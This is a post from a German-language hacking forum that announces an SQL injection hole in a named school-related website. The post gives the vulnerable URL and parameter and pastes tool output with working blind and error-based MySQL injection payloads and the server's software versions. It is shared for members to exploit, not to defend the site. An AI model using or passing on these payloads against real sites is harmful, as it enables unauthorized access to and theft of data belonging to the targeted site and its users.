Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLi] schuleplus-mv.de

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
ASR

ASR

    Noob

  • Members
  • PIPPIP
  • Likes
    2
  • 8 Beiträge
  • 1 Bedankt

http://www.schuleplus-mv.de/index.php?menuid=xxmenuidxx



Place: GET

Parameter: menuid

Type: boolean-based blind

Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)

Payload: menuid=xxmenuidxx%' RLIKE (SELECT (CASE WHEN (8771=8771) THEN 0x78786d656e7569647878 ELSE 0x28 END)) AND '%'='



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: menuid=xxmenuidxx%' AND (SELECT 3253 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (CASE WHEN (3253=3253) THEN 1 ELSE 0 END)),0x717a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

---

web application technology: Apache, PHP 5.2.17

back-end DBMS: MySQL 5.0


Bearbeitet von Ch!ller, 03 December 2014 - 14:10 Uhr.




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


Dieses Thema wurde von 32 Mitglied(ern) gelesen


    , ASR, Babo187, bbxhnr, BlackZetsu, Ch!ller, chick0n, clusterhead, cooky1, DramaModz691, eXalT, FakeKeyUser, FalkE, Framerater, Gerald, lion., most_uniQue, Netwxrk, Osed28, pdr0, R3s1stanc3, riki-r0ki, SavE1, SepaX, snowmanx, Toolbase, trooperhdx, VENNI, VeqasZ, weedneger, Xenio, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.